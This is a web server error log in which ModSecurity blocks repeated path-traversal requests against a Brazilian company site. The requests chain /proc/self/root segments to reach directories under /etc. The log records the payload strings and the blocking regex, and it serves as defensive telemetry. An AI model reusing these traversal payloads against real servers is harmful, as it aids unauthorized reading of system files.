[Wed Mar 18 06:58:20.598175 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.243.128:48782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3PNY0UrI5A3LftIxwMAAAAZY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:58:23.979032 2026] [:error] [pid 26799:tid 140411699963648] [client 74.7.243.128:43884] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/xinetd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3P9a6ubjKNq_cu4ZskQAAA0U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:58:28.224362 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.243.128:43898] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3Q_u8EFLIOrSqIpvbngAAAkE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:58:29.513644 2026] [:error] [pid 17653:tid 140411725141760] [client 74.7.243.128:58842] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3Rcdf6f5d65gmYZSpaAAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:58:33.379131 2026] [:error] [pid 19507:tid 140411741927168] [client 74.7.243.128:58846] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3SdY0UrI5A3LftIxwNQAAAYA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:58:34.327294 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:52208] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/percona-server.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3Svu8EFLIOrSqIpvbpAAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:58:34.771077 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:58862] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3SuoXxyEfFpUF8f9DWwAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:58:40.235183 2026] [:error] [pid 31803:tid 140411683178240] [client 74.7.243.128:58872] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3UOyqAr6etmhZHNqSIwAAAEc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:58:41.570947 2026] [:error] [pid 15051:tid 140411632822016] [client 74.7.243.128:43300] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3USmAPhZkrhU8w4lEuQAAAI0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:58:42.855302 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:43302] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3UtY0UrI5A3LftIxwOgAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:58:44.197060 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:43314] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3VMdf6f5d65gmYZSpbwAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:58:45.539154 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:43326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3VdY0UrI5A3LftIxwPQAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:58:50.179170 2026] [:error] [pid 19507:tid 140411666392832] [client 74.7.243.128:43336] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3WtY0UrI5A3LftIxwQwAAAYk"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:58:59.907203 2026] [:error] [pid 19507:tid 140411599251200] [client 74.7.243.128:46786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/my.cnf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3Y9Y0UrI5A3LftIxwTwAAAZE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:59:08.195732 2026] [:error] [pid 15826:tid 140411590858496] [client 74.7.241.31:52176] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3bOoXxyEfFpUF8f9DhwAAAVI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:59:12.943323 2026] [:error] [pid 30077:tid 140411674785536] [client 74.7.241.31:35504] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/cron.daily"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3cPu8EFLIOrSqIpvbsQAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:59:27.778656 2026] [:error] [pid 15051:tid 140411565680384] [client 74.7.243.128:45590] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/xdg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3fymAPhZkrhU8w4lE1gAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:59:31.207480 2026] [:error] [pid 26799:tid 140411658000128] [client 74.7.243.128:42326] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/selinux"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3g9a6ubjKNq_cu4ZsxwAAA0o"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:59:33.575538 2026] [:error] [pid 17887:tid 140411582465792] [client 74.7.243.128:47744] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3hQkwaGbbGflqUZDoBQAAANM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:59:34.839370 2026] [:error] [pid 15826:tid 140411632822016] [client 74.7.243.128:47756] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3huoXxyEfFpUF8f9DiQAAAU0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:59:40.795286 2026] [:error] [pid 11816:tid 140411632822016] [client 74.7.243.128:47772] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3jOw_le52K8_3pV23HwAAAg0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:59:43.506735 2026] [:error] [pid 17887:tid 140411616036608] [client 74.7.243.128:56984] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3jgkwaGbbGflqUZDoDQAAAM8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:59:45.928145 2026] [:error] [pid 11816:tid 140411590858496] [client 74.7.243.128:56994] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/yum"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp3kew_le52K8_3pV23IwAAAhI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
